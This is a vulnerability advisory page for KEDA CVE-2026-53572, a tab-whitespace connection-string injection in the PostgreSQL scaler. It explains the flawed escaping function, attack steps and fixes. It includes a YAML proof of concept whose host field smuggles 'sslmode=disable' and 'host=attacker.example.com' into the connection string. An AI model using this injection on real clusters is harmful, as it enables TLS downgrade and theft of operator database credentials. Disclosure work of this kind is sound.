Skip to main content

KEDA CVE-2026-53572

MEDIUM
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (CWE-74)
2026-07-07 https://github.com/kedacore/keda GHSA-6w3m-4hhp-775q
5.9
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.9 MEDIUM
AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N
vuln.today AI
7.1 HIGH

Lowered AC to L because tab injection into a hostname field is trivially simple for any tenant once the technique is known; PR:L retained as ScaledObject creation rights are required.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
4.0 AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

1
Analysis Generated
Jul 08, 2026 - 00:30 vuln.today

DescriptionGitHub Advisory

Summary

pkg/scalers/postgresql_scaler.go builds libpq-style connection strings by concatenating key=value pairs separated by spaces. Each tenant-controllable field (host, port, userName, dbName, sslmode) is passed through escapePostgreConnectionParameter:

go
func escapePostgreConnectionParameter(str string) string {
    if !strings.Contains(str, " ") {
        return str       // returned as-is for any non-space whitespace
    }
    str = strings.ReplaceAll(str, "'", "\\'")
    return fmt.Sprintf("'%s'", str)
}

The function only escapes when a literal space is present. Per libpq/pgx documentation, parameters are also separated by tabs, newlines, carriage returns, and form feeds, and backslashes are parsed inside quoted strings. Because those characters are not detected, a tenant-supplied value like mydb\tsslmode=disable\thost=attacker.example.com splits into additional key=value tokens when parsed by pgx, injecting attacker-controlled connection parameters.

Vulnerable code

pkg/scalers/postgresql_scaler.go, lines 155-164 and 250-257.

Impact

Tenants with the ability to create a TriggerAuthentication or ScaledObject that populates any of host, port, userName, dbName, sslmode can:

  • Force sslmode=disable on a connection that the cluster owner intended to be TLS-only - silently downgrading to plaintext and enabling on-path MitM.
  • Redirect the connection to an attacker-controlled host (host=...) to steal the credentials the operator supplies via the password= keyword.
  • Append arbitrary libpq runtime parameters (options=, application_name=, target_session_attrs=) to pivot behavior.

Note: the password parameter is appended last in buildConnArray, which limits but does not eliminate credential exfiltration - injected host= still redirects the subsequent password= keyword's target.

Proof of concept

yaml
triggers:
- type: postgresql
  metadata:
    host: "legit.db.svc\tsslmode=disable\thost=attacker.example.com"
    port: "5432"
    userName: "keda"
    dbName: "metrics"
    sslmode: "require"
    query: "SELECT 1"

After escapePostgreConnectionParameter (no space → returned unchanged), the resulting connection string is parsed by pgx into parameters that include host=attacker.example.com and sslmode=disable.

Suggested fix

  • Escape / reject any ASCII whitespace (\t, \n, \r, \f, \v, space) and backslash.
  • Prefer the URI form (postgres://user:pass@host:port/db?sslmode=require) with proper URL-encoding.
  • Validate each field against an allow-list pattern before use.

Resources

  • pkg/scalers/postgresql_scaler.go
  • libpq connection string parsing: https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-CONNSTRING

AnalysisAI

Connection string injection in KEDA's PostgreSQL scaler allows low-privileged tenants to inject arbitrary libpq connection parameters by embedding tab, newline, or other non-space whitespace characters into ScaledObject or TriggerAuthentication configuration fields. The escapePostgreConnectionParameter function in pkg/scalers/postgresql_scaler.go only detects literal spaces before quoting values, leaving all other libpq token delimiters unescaped; successful exploitation forces TLS downgrade (sslmode=disable) or redirects database connections to attacker-controlled hosts to steal operator-supplied credentials. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain tenant Kubernetes RBAC rights to create ScaledObject
Delivery
Craft postgresql trigger with tab-embedded host field
Exploit
Submit resource to KEDA API server
Install
escapePostgreConnectionParameter returns payload unmodified (no space detected)
C2
pgx parses injected whitespace-delimited tokens as override connection parameters
Execute
PostgreSQL connection redirected to attacker host with sslmode=disable
Impact
Capture operator-supplied plaintext credentials

Vulnerability AssessmentAI

Exploitation Exploitation requires Kubernetes RBAC permission to create or modify ScaledObject or TriggerAuthentication resources referencing the postgresql trigger type within a KEDA-managed namespace - this is the low-privilege (PR:L) requirement in the CVSS vector. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The provided CVSS 5.9 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N) assigns High attack complexity, likely reflecting the non-obvious whitespace technique; however, the injection method is mechanically trivial for any informed tenant - simply embedding a tab character in a hostname string - which suggests real-world AC is closer to Low once the technique is known. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A tenant with Kubernetes RBAC permission to create ScaledObjects submits a postgresql trigger whose host field contains an embedded tab character: `legit.db.svc\tsslmode=disable\thost=attacker.example.com`. KEDA's escaping function returns the value unchanged because no literal space is detected, and pgx subsequently parses the resulting connection string as three separate tokens, overriding the cluster operator's intended TLS configuration and legitimate target host. …
Remediation No vendor-released patch version was identified in the available advisory data at time of analysis; the KEDA releases page and GitHub advisory at https://github.com/kedacore/keda/security/advisories/GHSA-6w3m-4hhp-775q should be monitored for a confirmed fix version. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2025-1094 HIGH POC
8.1 Feb 13

PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() improperl

CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2013-1899 MEDIUM POC
6.5 Apr 04

Argument injection vulnerability in PostgreSQL 9.2.x before 9.2.4, 9.1.x before 9.1.9, and 9.0.x before 9.0.13 allows re

CVE-2026-20253 CRITICAL POC
9.8 Jun 10

Unauthenticated arbitrary file write in Splunk Enterprise (below 10.2.4 and 10.0.7) and Splunk Cloud Platform (below 10.

CVE-2017-7546 CRITICAL
9.8 Aug 16

PostgreSQL versions before 9.2.22, 9.3.18, 9.4.13, 9.5.8 and 9.6.4 are vulnerable to incorrect authentication flaw allow

CVE-2015-1352 MEDIUM POC
5.0 Mar 30

The build_tablename function in pgsql.c in the PostgreSQL (aka pgsql) extension in PHP through 5.6.7 does not validate t

CVE-2024-10553 CRITICAL POC
9.8 Mar 20

A vulnerability in the h2oai/h2o-3 REST API versions 3.46.0.4 allows unauthenticated remote attackers to execute arbitra

CVE-2019-9193 HIGH POC
7.2 Apr 01

In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_serve

CVE-2026-40887 CRITICAL POC
9.1 Apr 14

## Summary An unauthenticated SQL injection vulnerability exists in the Vendure Shop API. A user-controlled query strin

CVE-2022-24760 CRITICAL POC
10.0 Mar 12

Parse Server is an open source http web server backend. Rated critical severity (CVSS 10.0), this vulnerability is remot

CVE-2025-56157 CRITICAL POC
9.8 Dec 18

Hard-coded default PostgreSQL credentials shipped in the docker-compose.yaml of langgenius Dify through version 1.5.1 al

CVE-2024-12909 CRITICAL POC
9.8 Mar 20

A vulnerability in the FinanceChatLlamaPack of the run-llama/llama_index repository, versions up to v0.12.3, allows for

Share

CVE-2026-53572 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy